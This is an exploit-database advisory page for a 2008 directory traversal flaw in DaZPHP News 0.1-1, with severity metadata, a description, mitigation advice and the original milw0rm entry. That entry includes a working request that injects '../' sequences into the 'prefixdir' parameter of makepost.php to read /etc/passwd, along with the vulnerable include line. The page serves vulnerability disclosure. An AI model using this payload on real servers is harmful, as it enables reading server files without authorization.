header-logo
Suggest Exploit
vendor:
DaZPHP News
by:
Kezzap66345, Str0ke, Dread 35
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: DaZPHP News
Affected Version From: 0.1-1
Affected Version To: 0.1-1
Patch Exists: NO
Related CWE: N/A
CPE: a:dazphp:dazphp_news
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

DaZPHP

DaZPHP is vulnerable to a directory traversal attack which allows an attacker to read arbitrary files from the server. This is due to a lack of proper sanitization of user-supplied input to the 'prefixdir' parameter in the 'makepost.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../../../../etc/passwd') to the vulnerable script.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered to ensure that it does not contain any malicious characters.
Source

Exploit-DB raw data:

Script Name : DaZPHP

Download : http://sourceforge.net/project/showfiles.php?group_id=132192
Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../../etc/passwd

Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php";
Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]

Navigation

Suggest Exploit

Services By CQR